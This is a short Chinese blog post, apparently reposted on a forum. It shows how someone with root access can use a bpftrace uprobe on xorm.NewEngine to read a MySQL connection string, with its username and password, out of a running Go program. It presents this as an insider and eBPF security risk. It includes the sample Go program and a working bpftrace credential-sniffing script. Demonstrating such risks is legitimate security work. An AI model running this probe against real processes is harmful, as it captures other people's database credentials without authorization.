|
|
前言
记得在360实习的时候,听到过一句话,大部分的安全问题并不是黑客造成的,而是内部人员。
epbf可以避免代码侵入,像桩子一样监控应用,同时也带来了一些安全问题。
下面简单演示一下如何利用bpftrace窃取Mysql的账号密码。
步骤
Go程序
- 这个程序只是利用xorm连接数据库,然后判断student这张表是否存在,
- package main
- import (
- "fmt"
- _ "github.com/go-sql-driver/mysql"
- "log"
- "xorm.io/xorm"
- )
- func main() {
- db, err := xorm.NewEngine("mysql", "root:123456@tcp(127.0.0.1:3306)/testdb?charset=utf8&parseTime=True&loc=Asia%2FShanghai")
- if err != nil {
- log.Fatalln("fail to connect mysql", err)
- }
- fmt.Println(db.IsTableExist("student"))
- db.Close()
- }
- #! /bin/bpftrace
- uprobe:./main:"xorm.io/xorm.NewEngine"
- {
- printf("参数: %s\n", str(reg("cx"),reg("di")));
- }
so,只要你有root权限,就有可能将各种敏感信息拿到手。
目前Linux内核和ebpf的应用在国内还没有铺开,相信未来会成为安全的挑战之一。
来源:https://www.cnblogs.com/NetRookieX/p/17180707.html
免责声明:由于采集信息均来自互联网,如果侵犯了您的权益,请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容,谢谢合作! |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
x
|
